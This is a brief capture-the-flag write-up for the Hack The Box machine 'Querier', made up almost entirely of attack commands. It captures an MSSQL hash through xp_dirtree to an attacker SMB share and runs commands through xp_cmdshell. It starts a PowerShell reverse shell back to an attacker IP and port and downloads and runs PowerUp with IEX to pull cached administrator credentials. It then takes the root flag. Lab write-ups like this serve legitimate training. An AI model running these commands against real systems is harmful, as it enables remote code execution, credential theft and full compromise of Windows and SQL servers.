Querier - Hack The Box

N/A
hackthebox
windows
medium
mssql
powerup
smb
Author

0xPThree

Published

June 1, 2019

{: style=“float: right; width: 200px; margin-left: 2em”}

N/A







USER

LISTENER:

python smbserver.py -smb2support -ip 10.10.14.3 reporting /tmp 

RUN:

python mssqlclient.py -windows-auth querier/reporting:PcwTWTHRwryjc\$c6@10.10.10.125
SQL> EXEC master.sys.xp_dirtree '\\10.10.14.3\tmp'

Connect with credentials:

python mssqlclient.py querier/mssql-svc:corporate568@10.10.10.125 -windows-auth

> xp_cmdshell type C:\Users\mssql-svc\Desktop\user.txt



# ROOT

Start smbserver and netcat listener:

$ python smbserver.py -smb2support -ip 10.10.14.11 querier /tmp
$ nc -lnvp 4444

Get reverse shell with PowerShellTcp:

SQL > xp_cmdshell move \\10.10.14.11\querier\Invoke-PowerShellTcp.ps1 C:\Users\mssql-svc\Desktop\pENIS.ps1
SQL > xp_cmdshell "powershell -file c:\Users\mssql-svc\Desktop\pENIS.ps1 -Reverse -IPAddress 10.10.14.11 -Port 4444"

PS > IEX (New-Object Net.WebClient).DownloadString('\\10.10.14.11\querier\PowerUp.ps1'); Invoke-AllChecks
 [*] Checking for cached Group Policy Preferences .xml files....
 Usernames : {Administrator}
 Passwords : {MyUnclesAreMarioAndLuigi!!1!}

Grab flag:

$ python smbclient.py querier/Administrator:MyUnclesAreMarioAndLuigi\!\!1\!@10.10.10.125
$ use C$
$ cd Users/Administrator/Desktop
$ get root.txt